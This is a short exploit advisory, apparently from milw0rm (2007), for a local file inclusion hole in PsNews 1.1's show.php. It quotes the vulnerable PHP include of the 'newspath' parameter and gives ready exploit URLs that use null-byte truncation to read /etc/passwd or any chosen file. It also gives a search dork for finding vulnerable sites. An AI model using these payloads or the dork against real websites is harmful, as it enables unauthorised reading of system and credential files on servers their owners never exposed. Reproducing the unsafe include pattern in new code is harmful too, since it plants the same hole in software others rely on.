# o [bug] /"*._ _ # # . . . .-*'` `*-.._.-'/ # # o o < * )) , ( # # . o `*-._`._(__.--*"`.\ # # # # vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion # # author: irk4z@yahoo.pl # # download: # # http://www.strefaphp.net/index.php?page=download&what=download&fid=12 # # dork: "Powered by PsNews" ;] # /news/show.php: ... if(eregi("://", $newspath)){ die("Nieautoryzowany dostęp!"); } if(!isset($newspath)){ $newspath = "news"; } include("$newspath/functions.php"); ... # exploit: http://[site]/[path]/news/show.php?newspath=/etc/passwd%00 http://[site]/[path]/news/show.php?newspath=[file]%00 # greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :* # milw0rm.com [2007-07-12]